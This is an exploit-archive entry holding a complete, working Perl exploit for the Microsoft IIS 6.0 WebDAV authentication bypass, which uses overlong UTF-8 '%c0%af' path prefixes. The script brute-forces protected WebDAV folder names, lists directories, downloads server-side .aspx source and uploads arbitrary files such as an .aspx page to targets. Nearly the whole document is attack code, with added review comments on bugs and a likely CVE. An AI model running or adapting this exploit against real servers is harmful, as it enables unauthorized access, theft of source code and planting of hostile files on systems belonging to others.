Microsoft IIS 6.0 WebDAV Auth. Bypass

2010.09.25
Credit: FoX HaCkEr
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

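#!/usr/bin/perl
# ======================================================================
#  MS IIS 6.0 WebDAV Auth. Bypass Exploit v1.1
#  Author : FoX HaCkEr   Contact : MKQ@HoTmAiL.CoM   SiTe : www.sec4ever.com
#  (the banner printed by hello() credits the original code to "csgcsg 090529")
#
#  ********* !!! WARNING !!! *********
#  *  FOR SECURITY TESTiNG ONLY!    *   Run it only against hosts you are
#  ***********************************  explicitly authorised to test.
#
#  v1.1  add brute force dir function.
#  v1.0  download/upload and list dir.
#
#  How it works: every request path is prefixed with "/%c0%af", an overlong
#  (non-shortest-form, therefore invalid) UTF-8 encoding of "/".  The bypass
#  relies on the server authorising the raw, still-encoded path and only
#  afterwards decoding it to a plain "/", so a password-protected WebDAV
#  folder is reached without credentials.  Anything that rejects overlong
#  UTF-8 before the authorisation check (a patched IIS, a reverse proxy, a
#  WAF) makes the script report FAILED.
#  NOTE(review): this looks like the 2009 IIS 6.0 WebDAV Unicode auth-bypass
#  (MS09-020 / CVE-2009-1535) -- confirm before citing it as such.
#
#  Talks plain HTTP over TCP only (no TLS).  The request timeout uses alarm(),
#  so a Unix-like perl is required (Cygwin/WSL on Windows).  "threads" was
#  imported by v1.0 but never used and is no longer loaded.
#
#  Usage:
#   IIS6_webdav.pl -target -port -method -webdavpath|-BruteForcePath [-file]
#     -target            eg.: 192.168.1.1
#     -port              eg.: 80
#     -method            eg.: g          (p:PUT, g:GET, l:LIST)
#     -webdavpath        eg.: webdav     (alias of -xpath)
#     -BruteForcePath    eg.: dirdic.txt (alias of -bpath; one folder name per line)
#     -file (optional)   eg.: test.aspx  (required for PUT and GET; also the local
#                                         file name read for PUT / written for GET)
#  Example:
#   put a file:          IIS6_webdav.pl -t 192.168.1.1 -p 80 -m p -x webdav -f test.aspx
#   get a file:          IIS6_webdav.pl -t 192.168.1.1 -p 80 -m g -x webdav -f test.aspx
#   list dir:            IIS6_webdav.pl -t 192.168.1.1 -p 80 -m l -x webdav
#   brute force + list:  IIS6_webdav.pl -t 192.168.1.1 -p 80 -m l -b dirdic.txt
#   brute force + get:   IIS6_webdav.pl -t 192.168.1.1 -p 80 -m g -b dirdic.txt -f test.aspx
# ======================================================================
use strict;
use warnings;
use IO::Socket::INET;
use Getopt::Long;

# Seconds allowed for connect + full response before a request is abandoned.
my $TIMEOUT = 10;

# ---------------------------------------------------------------------
# Command line
# ---------------------------------------------------------------------
my ($target, $port, $method, $xpath, $bpath, $file);
GetOptions(
    'target=s'             => \$target,   # host being probed
    'port=i'               => \$port,     # web server port
    'method=s'             => \$method,   # p / g / l
    'xpath|webdavpath=s'   => \$xpath,    # WebDAV folder on the server
    'bpath|BruteForcePath=s' => \$bpath,  # wordlist of candidate folders
    'file=s'               => \$file,     # remote (and local) file name
    'help|?'               => sub { hello(); exit(0); },
) or do { hello(); exit(1); };

my $error = '';
$error .= "Error: You must specify a target host\n"
    unless defined $target && length $target;
$error .= "Error: You must specify a target port\n"
    unless defined $port;
$error .= "Error: Port must be between 1 and 65535\n"
    if defined $port && ($port < 1 || $port > 65535);
$error .= "Error: You must specify a put,get or list method\n"
    unless defined $method && length $method;
$error .= "Error: You must specify a webdav path\n"
    unless (defined $xpath && length $xpath) || (defined $bpath && length $bpath);
# v1.0 wrote `$method != "l"`, a numeric compare of two strings, which is
# always false -- so a missing -file was never reported for PUT/GET.
$error .= "Error: You must specify a upload or download file name\n"
    if !(defined $file && length $file) && (!defined $method || lc $method ne 'l');
if ($error) {
    print "Try '$0 -help' or '$0 -?' for more information.\n$error\n";
    exit(1);
}
hello();

# Map the one-letter selector onto the HTTP verb it stands for.
my %verb_for = (p => 'PUT', g => 'GET', l => 'PROPFIND');
my $httpmethod = $verb_for{ lc $method };
if (!defined $httpmethod) {
    print "$method Method not accept !!!\n";
    exit(0);
}

# ---------------------------------------------------------------------
# Pre-flight: is it IIS, is WebDAV on, is the verb advertised?
# ---------------------------------------------------------------------
webdavtest($target, $port, $httpmethod);

# Optional: locate a password-protected WebDAV folder to aim at.
if (defined $bpath && length $bpath) {
    $xpath = webdavbf($target, $port, $bpath);
}
print "-" x 60 . "\n";

# ---------------------------------------------------------------------
# Build the raw request
# ---------------------------------------------------------------------
# "Translate: f" asks IIS for the stored file itself rather than the output
# of running it, which is what makes GET of an .aspx source meaningful.
my $request;
if ($httpmethod eq 'PUT') {
    my $content  = slurp_binary($file);
    my $filesize = length $content;
    print "$file size is $filesize bytes\n";
    $request = "PUT /%c0%af$xpath/$file HTTP/1.0\r\n"
             . "Translate: f\r\nHost: $target\r\nContent-Length: $filesize\r\n\r\n"
             . $content;
}
elsif ($httpmethod eq 'GET') {
    $request = "GET /%c0%af$xpath/$file HTTP/1.0\r\n"
             . "Translate: f\r\nHost: $target\r\nConnection: close\r\n\r\n";
}
else {    # PROPFIND
    # v1.0 declared "Content-Length: 0" and then appended an XML propfind
    # body that the server consequently never read.  A body-less PROPFIND
    # means "allprop", so sending no body reproduces exactly what reached
    # IIS.  No Depth header is sent (as before); add "Depth: 1\r\n" if the
    # server refuses infinite-depth listings.
    $request = "PROPFIND /%c0%af$xpath/ HTTP/1.0\r\n"
             . "Host: $target\r\nConnection: close\r\n"
             . "Content-Type: text/xml; charset=\"utf-8\"\r\nContent-Length: 0\r\n\r\n";
}

my $what = defined $file ? $file : '';
print "-" x 60 . "\n$httpmethod $what , Please wait ...\n" . "-" x 60 . "\n";

# ---------------------------------------------------------------------
# Send it and act on the status line
# ---------------------------------------------------------------------
my @results = sendraw2($request, $target, $port, $TIMEOUT);
die "${TIMEOUT}s timeout to $target on port $port\n" unless @results;

# Any 2xx counts as success (PROPFIND answers "207 Multi-Status").
my $ok = $results[0] =~ m{^HTTP/1\.[01] 2\d\d };
print "-" x 60 . "\n";
if (!$ok) {
    print "$httpmethod $what from [$target:$port/$xpath] FAILED!!!\r\n";
}
elsif ($httpmethod eq 'PUT') {
    print "PUT $file from [$target:$port/$xpath] OK\r\n";
}
elsif ($httpmethod eq 'GET') {
    # The body starts after the first empty line.  v1.0 instead assumed
    # "Accept-Ranges" was the last header and skipped two lines past it,
    # and its slice ran one element past the end of @results.
    my $i = 0;
    $i++ while $i < @results && $results[$i] !~ /^\r?\n\z/;
    my @body = @results[$i + 1 .. $#results];
    # -file is reused as the local output path, relative to the current
    # directory; pass a bare file name unless you mean to write elsewhere.
    open my $out, '>', $file or die "Could not write to file: $!\n";
    binmode $out;
    print {$out} @body;
    close $out or die "Could not write to file: $!\n";
    print "GET $file from [$target:$port/$xpath] OK\r\nPlease check $file on local disk\r\n";
}
else {    # PROPFIND
    print "PROPFIND path list from [$target:$port/$xpath] OK\r\n";
    # IIS returns the multistatus document on one line using the "a:" prefix
    # for the DAV: namespace; accept any prefix (or none) and print each href.
    my $xml   = join '', @results;
    my @hrefs = $xml =~ m{<(?:\w+:)?href>([^<]*)</(?:\w+:)?href>}gi;
    print map { "$_\n" } @hrefs;
}
print "-" x 60 . "\n";
exit(0);

# ---------------------------------------------------------------------
# sendraw2($payload, $host, $port, $timeout)
# Connect over TCP, write the raw request bytes, read until the server
# closes, and return the response as a list of lines with CRLF kept.
# Prints the reason and returns an empty list on connect/write/read
# failure or when $timeout seconds elapse.  (v1.0's timeout flag was a
# sub-local `my` shadowing the global the ALRM handler set, so the
# in-loop timeout test could never fire.)
# ---------------------------------------------------------------------
sub sendraw2 {
    my ($payload, $host, $port, $timeout) = @_;
    my @in;
    my $done = eval {
        local $SIG{ALRM} = sub { die "Timeout\n" };
        alarm($timeout);
        my $sock = IO::Socket::INET->new(
            PeerAddr => $host,
            PeerPort => $port,
            Proto    => 'tcp',
            Timeout  => $timeout,
        ) or die "Socket problems: $@\n";
        $sock->autoflush(1);
        print {$sock} $payload or die "Write failed: $!\n";
        @in = <$sock>;
        close $sock;
        1;
    };
    alarm(0);
    return @in if $done;
    my $why = $@ || 'unknown error';
    chomp $why;
    print STDOUT "$why\n";
    return ();
}

# ---------------------------------------------------------------------
# webdavtest($ip, $port, $verb)
# Send "OPTIONS /" and exit(0) unless the Server header says Microsoft-IIS,
# a "DAV:" header is present and the "Public:" header (when sent) lists
# $verb.  Headers are collected first so their order does not matter.
# ---------------------------------------------------------------------
sub webdavtest {
    my ($testip, $testport, $verb) = @_;
    print "-" x 60 . "\n";
    print "Testing WebDAV methods [$testip $testport]\n";
    print "-" x 60 . "\n";
    # A Host header is included so name-based virtual hosts answer too.
    my @resp = sendraw2("OPTIONS / HTTP/1.0\r\nHost: $testip\r\n\r\n",
                        $testip, $testport, $TIMEOUT);
    die "${TIMEOUT}s timeout to $testip on port $testport\n" unless @resp;

    my %hdr;
    for my $line (@resp) {
        last if $line =~ /^\r?\n\z/;    # end of the header block
        $hdr{ lc $1 } = $2 if $line =~ /^([\w-]+):\s*(.*?)\s*$/;
    }

    if (defined $hdr{server}) {
        (my $server = $hdr{server}) =~ s/ //g;
        print "$testip : Server type is : $server\n";
        if ($server !~ /Microsoft-IIS/i) {
            print "$testip : Not a Microsoft IIS Server\n";
            exit(0);
        }
    }
    if (!defined $hdr{dav}) {
        print "$testip : WebDAV disable\n";
        exit(0);
    }
    if (defined $hdr{public}) {
        (my $methods = $hdr{public}) =~ s/ //g;
        print "$testip : Method type is : $methods\n";
        if ($methods !~ /\Q$verb\E/i) {
            print "$testip : Not allow $verb on this WebDAV Server\n";
            exit(0);
        }
    }
    return;
}

# ---------------------------------------------------------------------
# webdavbf($ip, $port, $wordlist)
# PROPFIND each folder name in $wordlist *without* the %c0%af prefix.  The
# first one answering 401 is a password-protected WebDAV folder -- the
# thing the bypass is for -- and is returned; an open folder answers 207
# and is skipped.  exit(0) when the list is exhausted.
# ---------------------------------------------------------------------
sub webdavbf {
    my ($bfip, $bfport, $bfpath) = @_;
    print "-" x 60 . "\n";
    print "Try to brute forceing WebDAV path ...\n";
    print "-" x 60 . "\n";
    open my $bf, '<', $bfpath or die "Could not open file $bfpath: $!\n";
    while (my $cand = <$bf>) {
        # Strip CR as well as LF: v1.0 chomp()ed only "\n", so a DOS-format
        # wordlist put a bare CR into the request line.  Blank lines, '#'
        # comments and entries with whitespace/control characters (which
        # cannot appear raw in a request-target) are skipped.
        $cand =~ s/[\r\n]+\z//;
        next if $cand eq '' || $cand =~ /^#/ || $cand =~ /[^\x21-\x7e]/;
        my $req = "PROPFIND /$cand/ HTTP/1.0\r\n"
                . "Host: $bfip\r\nConnection: close\r\n"
                . "Content-Type: text/xml; charset=\"utf-8\"\r\nContent-Length: 0\r\n\r\n";
        my @resp = sendraw2($req, $bfip, $bfport, $TIMEOUT);
        die "${TIMEOUT}s timeout to $bfip on port $bfport\n" unless @resp;
        print "[$cand]...$resp[0]";
        if ($resp[0] =~ m{^HTTP/1\.[01] 401 }) {
            close $bf;
            print "Find out path on [$cand]\n";
            return $cand;
        }
    }
    close $bf;
    print "Sorry... We can not find any more path... :(\n";
    exit(0);
}

# ---------------------------------------------------------------------
# slurp_binary($path): return the whole file as raw bytes; dies if it
# cannot be opened.  Used for the PUT payload and its Content-Length.
# ---------------------------------------------------------------------
sub slurp_binary {
    my ($path) = @_;
    open my $in, '<', $path or die "Could not open file $path: $!\n";
    binmode $in;
    my $bytes = do { local $/; <$in> };
    close $in;
    return defined $bytes ? $bytes : '';
}

# ---------------------------------------------------------------------
# hello(): print the banner and usage.
# ---------------------------------------------------------------------
sub hello {
    print "\n";
    print "\t ##################################################\n";
    print "\t # MS IIS 6.0 WebDAV Auth. Bypass Exploit V1.1 #\n";
    print "\t # **************** !!! WARNING !!! **************#\n";
    print "\t # **** FOR PRIV8 AND EDUCATIONAL USE ONLY! ****#\n";
    print "\t # ***********************************************#\n";
    print "\t # Written by csgcsg 090529 ; #\n";
    print "\t ###################################################\n";
    print "\n\t $0 -target -port -method -webdavpath|-BruteForcePath [-file]\n";
    print "\n\t -target\t\t eg.: 192.168.1.1\n";
    print "\t -port\t\t\t eg.: 80\n";
    print "\t -method (p:PUT, g:GET, l:LIST)\t eg.: g\n";
    print "\t -webdavpath|-BruteForcePath\t\t eg.: webdav\n";
    print "\t -file\t\t\t eg.: test.aspx\n\n";
    print "\tUsage eg.: \n\t$0 -t 192.168.1.1 -p 80 -m p -x webdav -f test.aspx\n";
    return;
}

# Gr33ts: Mr.MoDaMeR & SILVER FoX & Z7FAN HaCkEr & Black Cobra & KinG oF CnTroL &
# MadjiX & Ma3sTr0-Dz Lagripe-Dz & Shi6oN HaCkEr & ALL Members sec4ever &
# ALL MY Friend in MsN & ALL Members p0c team &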

